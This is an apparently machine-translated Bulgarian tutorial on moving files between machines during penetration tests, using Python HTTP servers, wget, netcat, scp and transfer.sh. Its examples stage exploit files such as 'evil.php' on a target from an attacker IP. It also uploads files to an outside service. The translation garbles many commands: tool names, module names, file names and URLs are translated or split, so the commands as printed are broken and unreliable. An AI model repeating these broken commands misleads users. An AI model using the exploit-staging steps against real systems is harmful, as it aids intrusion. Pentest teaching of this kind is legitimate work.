Прехвърлянето на експлойти, python скриптове и зареждащи модули често са необходими по време на дейностите за тестване на проникване. Тъй като терминалът е инструментът, използван най-вече, е от съществено значение да се разберат основите на прехвърлянето на файлове.
Тестерът за писалки трябва да бъде добре оборудван с различни трикове за прехвърляне на файлове от отдалечен сървър, както и от една директория в друга. В този урок ще обсъдим различни начини за прехвърляне на файлове с помощта на командния ред.
1. Python сървър
Python е основният пакет, който се предлага предварително инсталиран в почти всички базирани на Debian системи. За да прехвърлите файл от една машина на друга, направете следното;
Python2:
Преминете към директорията, където съществува вашият файл, който искате да прехвърлите. Стартирайте прост python сървър. Въведете следната команда;
$ python -m SimpleHTTPServer 8080
Сега отидете на машината, където искате да прехвърлите файла. Използвайте следната команда, за да изтеглите файла;
$ wget http: // 192.168.43.177: 8080 / файл
Не забравяйте да замените IP, номера на порта и името на файла.
Python3:
Всичко, написано на python2, почти винаги ще се счупи в python3. Така че ние също разглеждаме как да прехвърлим файл с помощта на python3.
В случай на python3, въведете следната команда, за да стартирате обикновен python сървър.
$ python3 -m http.сървър 8080
За да изтеглите файла на целта, въведете следната команда;
$ wget http: // 192.168.43.177: 8080 / експлойт.php
2. Netcat
Netcat е мощна помощна програма за прехвърляне на файлове от всяка отдалечена машина на локална машина. Той не винаги може да бъде инсталиран. Можете да проверите дали съществува или не, като въведете;
$ който netcat
Като алтернатива, чрез въвеждане;$ които nc
Направете netcat сървър със следната команда;
$ nc -nlvp 8080 < evil.php
Сега отидете на целевата машина и въведете следното, за да изтеглите файла;
$ nc -nv 192.168.43.177 8080> зло.php
Сменете nc
с netcat
в горните команди, ако nc не работи или не е инсталиран правилно.
3. SCP
Secure Copy Protocol е мощен инструмент за прехвърляне на файлове. Той е полезен, особено когато искате да прехвърлите директории. Също така се използва предимно за прехвърляне на файлове през ssh.
За прехвърляне на файл чрез ssh въведете следната команда на изпращащата машина;
$ scp -i нов.тест за пем.py ubuntu @ 18.220.68.229: / home / ubuntu
Където -i представлява публичния ключ за влизане в ssh, тест.py е файлът, който трябва да бъде прехвърлен, а / home / ubuntu е целевата директория, в която искаме да запазим файла.
За да изтеглите файл от отдалечената машина, въведете следната команда;
$ scp корен @ 192.168.43.177: / отдалечена_директория / файл / локална / директория
4. Прехвърляне.ш
Можете да използвате този инструмент на трета страна за прехвърляне на файлове. Може да бъде полезно, когато нямате машина с публичен IP и все пак трябва да прехвърлите файловете. Следващата команда качва файла в трансфера.sh сървъри;
$ curl --upload-файл ./ файл.txt https: // трансфер.sh / файл.текст
За да изтеглите файла, въведете следната команда;
$ curl https: // трансфер.sh // файл.txt -o файл.текст
Прехвърляне.sh все още се разработва и може да не работи винаги.
Заключение
Инструментите за команден ред ни дават възможност за прехвърляне на файлове по различни начини. Те може да изглеждат малко сложни, но получаването на ръцете им дава възможност за лесно управление на файлове, особено когато опцията за графичен интерфейс не е налична.